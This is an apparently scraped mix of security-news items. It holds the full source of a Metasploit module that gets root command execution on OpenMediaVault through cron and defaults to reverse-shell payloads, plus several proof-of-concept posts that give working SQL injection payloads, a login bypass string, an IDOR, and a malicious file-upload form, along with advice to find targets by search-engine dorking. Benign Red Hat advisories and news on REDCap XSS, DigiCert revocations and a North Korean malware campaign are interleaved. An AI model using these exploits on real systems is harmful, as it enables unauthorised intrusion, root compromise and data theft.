OpenMediaVault allows an authenticated user to create cron jobs as root on the system. An attacker can abuse this by sending a POST request via rpc.php to schedule and execute a cron entry that runs arbitrary commands as root on the system. All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::Deprecated  moved_from 'exploit/multi/http/openmediavault_cmd_exec'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenMediaVault rpc.php Authenticated Cron Remote Code Execution',        'Description' => %q{          OpenMediaVault allows an authenticated user to create cron jobs as root on the system.          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute          a cron entry that runs arbitrary commands as root on the system.          All OpenMediaVault versions including the latest release 7.4.2-2 are vulnerable.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Msf module contributor          'Brandon Perry <bperry.volatile[at]gmail.com>' # Original discovery and first msf module        ],        'References' => [          ['CVE', '2013-3632'],          ['PACKETSTORM', '178526'],          ['URL', 'https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats'],          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']        ],        'DisclosureDate' => '2013-10-30',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']),        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault']),        OptBool.new('PERSISTENT', [true, 'Keep the payload persistent in Cron. Default value is false, where the payload is removed', false])      ]    )  end  def user    datastore['USERNAME']  end  def pass    datastore['PASSWORD']  end  def rpc_success?(res)    res&.code == 200 && res.body.include?('"error":null')  end  def login(user, pass)    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")    # try the login options for all OpenMediaVault versions    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => {        service: 'Session',        method: 'login',        params: {          username: user,          password: pass        },        options: nil      }.to_json    })    unless res&.code == 200 && res.body.include?('"authenticated":true')      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => {          service: 'Authentication',          method: 'login',          params: {            username: user,            password: pass          }        }.to_json      })    end    unless res&.code == 200 && res.body.include?('"authenticated":true')      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => {          service: 'Authentication',          method: 'login',          params: [            {              username: user,              password: pass            }          ]        }.to_json      })      return res&.code == 200 && res.body.include?('"authenticated":true')    end    true  end  def check_target    print_status('Trying to detect if target is running a vulnerable version of OpenMediaVault.')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => {        service: 'System',        method: 'getInformation',        params: nil      }.to_json    })    return nil unless rpc_success?(res)    res  end  def check_version(res)    # parse json response and get the version    res_json = res.get_json_document    unless res_json.blank?      # OpenMediaVault v0.3 - v0.5 and up to v4 have different json formats where index 1 has the version information      version = res_json.dig('response', 1, 'value')      version = res_json.dig('response', 'version') if version.nil?      version = res_json.dig('response', 'data', 1, 'value') if version.nil?      return Rex::Version.new(version.split('(')[0].gsub(/[[:space:]]/, '')) unless version.nil? || version.split('(')[0].nil?    end    nil  end  def apply_config_changes    # Apply OpenMediaVault configuration changes    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'data' => {        service: 'Config',        method: 'applyChangesBg',        params: {          modules: [],          force: false        },        options: nil      }.to_json    })  end  def execute_command(cmd, _opts = {})    # OpenMediaFault current release - v6.0.15-1 uses an array definition ['*']    # OpenMediaVault v3.0.16 - v6.0.14-1 uses a string definition '*'    # OpenMediaVault v1.0.22 - v3.0.15 uses a string definition '*' and uuid setting 'undefined'    # OpenMediaVault v0.2.6.4 - v1.0.31 uses a string definition '*' and uuid setting 'undefined' and no execution parameter    # OpenMediaVault < v0.2.6.4 uses a string definition '*' and uuid setting 'undefined', no execution parameter and no everyN parameters    schedule = @version_number >= Rex::Version.new('6.0.15-1') ? ['*'] : '*'    uuid = @version_number <= Rex::Version.new('3.0.15') ? 'undefined' : 'fa4b1c66-ef79-11e5-87a0-0002b3a176b4'    if @version_number > Rex::Version.new('1.0.32')      post_data = {        service: 'Cron',        method: 'set',        params: {          uuid: uuid,          enable: true,          execution: 'exactly',          minute: schedule,          everynminute: false,          hour: schedule,          everynhour: false,          dayofmonth: schedule,          everyndayofmonth: false,          month: schedule,          dayofweek: schedule,          username: 'root',          command: cmd.to_s, # payload          sendemail: false,          comment: '',          type: 'userdefined'        },        options: nil      }.to_json    elsif @version_number >= Rex::Version.new('0.2.6.4')      post_data = {        service: 'Cron',        method: 'set',        params: {          uuid: uuid,          enable: true,          minute: schedule,          everynminute: false,          hour: schedule,          everynhour: false,          dayofmonth: schedule,          everyndayofmonth: false,          month: schedule,          dayofweek: schedule,          username: 'root',          command: cmd.to_s, # payload          sendemail: false,          comment: '',          type: 'userdefined'        }      }.to_json    else      post_data = {        service: 'Cron',        method: 'set',        params: [          {            uuid: uuid,            minute: schedule,            hour: schedule,            dayofmonth: schedule,            month: schedule,            dayofweek: schedule,            username: 'root',            command: cmd.to_s, # payload            comment: '',            type: 'userdefined'          }        ]      }.to_json    end    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'rpc.php'),      'method' => 'POST',      'ctype' => 'application/json',      'keep_cookies' => true,      'data' => post_data    })    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless rpc_success?(res)    # parse json response and get the uuid of the cron entry    # we need this later to clean up and hide our tracks    res_json = res.get_json_document    @cron_uuid = res_json.dig('response', 'uuid') || ''    # In early versions up to 0.4.x cron uuid does not get returned so try an extra query to get it    if @cron_uuid.blank?      if @version_number >= Rex::Version.new('0.2.6.4')        method = 'getList'      else        method = 'getListByType'      end      post_data = {        service: 'Cron',        method: method,        params: {          start: 0,          limit: -1,          sortfield: nil,          sortdir: nil,          type: ['userdefined']        }      }.to_json      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'ctype' => 'application/json',        'keep_cookies' => true,        'data' => post_data      })      res_json = res.get_json_document      # get total list of entries and pick the last one      index = res_json.dig('response', 'total')      @cron_uuid = res_json.dig('response', 'data', index - 1, 'uuid') || ''    end    # Apply and update cron configuration to trigger payload execution (1 minute)    # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply    apply_config_changes    print_status('Cron payload execution triggered. Wait at least 1 minute for the session to be established.')  end  def on_new_session(_session)    # try to cleanup cron entry in OpenMediaVault unless PERSISTENT option is true    unless datastore['PERSISTENT']      res = send_request_cgi({        'uri' => normalize_uri(target_uri.path, 'rpc.php'),        'method' => 'POST',        'ctype' => 'application/json',        'keep_cookies' => true,        'data' => {          service: 'Cron',          method: 'delete',          params: {            uuid: @cron_uuid.to_s          }          # options: nil        }.to_json      })      if rpc_success?(res)        # Apply changes and update cron configuration to remove the payload entry        # In early releases, you do not have to apply the changes, but the exact release change is unknown, so we always apply        apply_config_changes        print_good('Cron payload entry successfully removed.')      else        print_warning('Cannot access the cron services to remove the payload entry. If required, remove the entry manually.')      end    end    super  end  def check    @logged_in = login(user, pass)    return CheckCode::Unknown('Failed to authenticate at OpenMediaVault.') unless @logged_in    res = check_target    return CheckCode::Unknown('Can not identify target as OpenMediaVault.') if res.nil?    @version_number = check_version(res)    return CheckCode::Detected('Can not retrieve the version information.') if @version_number.nil?    return CheckCode::Appears("Version #{@version_number}") if @version_number.between?(Rex::Version.new('0.1'), Rex::Version.new('7.4.2-2'))    CheckCode::Detected("Version #{@version_number}")  end  def exploit    unless @logged_in      if login(user, pass)        res = check_target        fail_with(Failure::Unknown, 'Can not identify target as OpenMediaVault.') if res.nil?        @version_number = check_version(res)        if @version_number.nil?          print_status('Can not retrieve version information. Continue anyway...')        else          print_status("Version #{@version_number} detected.")        end      else        fail_with(Failure::NoAccess, 'Failed to authenticate at OpenMediaVault.')      end    end    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

OpenMediaVault rpc.php Authenticated Cron Remote Code Execution

SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : SchoolPlus LMS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: project_type_id=1 AND 5604=5604    Type: stacked queries    Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)    Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SchoolPlus LMS 1.0 SQL Injection

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

Red Hat Security Advisory 2024-4938-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a null pointer vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4938.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:4938-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4938Issue date:         2024-07-31Revision:           03CVE Names:          CVE-2024-38474====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)* httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)* httpd: NULL pointer dereference in mod_proxy (CVE-2024-38477)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38474References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295013https://bugzilla.redhat.com/show_bug.cgi?id=2295014https://bugzilla.redhat.com/show_bug.cgi?id=2295016

Red Hat Security Advisory 2024-4938-03

The security vulnerabilities, CVE-2024-37394, CVE-2024-37395, and CVE-2024-37396, could lay open proprietary and sensitive research to data thieves.

Source: Yuri Arcurs via Alamy Stock Photo

Researchers have discovered three cross-site scripting (XSS) vulnerabilities in Research Electronic Data Capture (REDCap), a Web application developed by Vanderbilt University and used for building and managing online surveys and databases for scientific and academic researchers.

The vulnerabilities are tracked as CVE-2024-37394, CVE-2024-37395, and CVE-2024-37396, and they "could allow attackers to execute malicious JavaScript code in victims' browsers, potentially compromising sensitive data," according to an advisory from Trustwave's SpiderLabs.

Researchers there identified the vulnerabilities in multiple locations within version 13.1.9 in REDCap, which is popular in universities and scientific institutions for managing studies that contain private, sensitive information. The vulnerable locations in the platform include calendar events, public surveys, and project dashboards.

"Our researchers developed proof-of-concept exploits for each vulnerable location," the researchers wrote. "In each case, they were able to inject a simple JavaScript payload that, when triggered, executes an alert displaying the document domain."

The vulnerabilities could allow threat actors to steal sensitive information, impersonate the victim's actions, manipulate the REDCap application, and even gain access to protected data.

It's recommended that users update to REDCap version 14.2.1 or later, where Vanderbilt University has addressed these bugs, to mitigate these flaws. 

**About the Author(s)**

Dangerous XSS Bugs in RedCAP Threaten Academic &amp; Scientific Research

Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4937.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish:6 security updateAdvisory ID:        RHSA-2024:4937-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4937Issue date:         2024-07-31Revision:           03CVE Names:          CVE-2024-30156====================================================================Summary: An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-30156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271486

Red Hat Security Advisory 2024-4937-03

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Cop 1.0 SQL Injection

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.
The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).
"Before issuing a certificate to a

Web Security / Compliance

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.

The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).

"Before issuing a certificate to a customer, DigiCert validates the customer's control or ownership over the domain name for which they are requesting a certificate using one of several methods approved by the CA/Browser Forum (CABF)," it said.

One of the ways this is done hinges on the customer setting up a DNS CNAME record containing a random value provided to them by DigiCert, which then performs a DNS lookup for the domain in question to make sure that the random values are the same.

The random value, per DigiCert, is prefixed with an underscore character so as to prevent a possible collision with an actual subdomain that uses the same random value.

What the Utah-based company found was that it had failed to include the underscore prefix with the random value used in some CNAME-based validation cases.

The issue has its roots in a series of changes that were enacted starting in 2019 to revamp the underlying architecture, as part of which the code adding an underscore prefix was removed and subsequently "added to some paths in the updated system" but not to one path that neither added it automatically nor checked if the random value had a pre-appended underscore.

"The omission of an automatic underscore prefix was not caught during the cross-functional team reviews that occurred before deployment of the updated system," DigiCert said.

"While we had regression testing in place, those tests failed to alert us to the change in functionality because the regression tests were scoped to workflows and functionality instead of the content/structure of the random value."

"Unfortunately, no reviews were done to compare the legacy random value implementations with the random value implementations in the new system for every scenario. Had we conducted those evaluations, we would have learned earlier that the system was not automatically adding the underscore prefix to the random value where needed."

Subsequently, on June 11, 2024, DigiCert said it revamped the random value generation process and eliminated the manual addition of the underscore prefix within the confines of a user-experience enhancement project, but acknowledged it again failed to "compare this UX change against the underscore flow in the legacy system."

The company said it didn't discover the non-compliance issue until "several weeks ago" when an unnamed customer reached out regarding the random values used in validation, prompting a deeper review.

It also noted that the incident impacts approximately 0.4% of the applicable domain validations, which, according to an update on the related Bugzilla report, affects 83,267 certificates and 6,807 customers.

Notified customers are recommended to replace their certificates as soon as possible by signing into their DigiCert accounts, generating a Certificate Signing Request (CSR), and reissuing them after passing DCV.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to publish an alert, stating that "revocation of these certificates may cause temporary disruptions to websites, services, and applications relying on these certificates for secure communication."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DigiCert to Revoke 83,000+ SSL Certificates Due to Domain Validation Oversight

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
"This form of attack is an

Malware / Software Development

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.

The activity cluster, dubbed **DEV#POPPER** and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web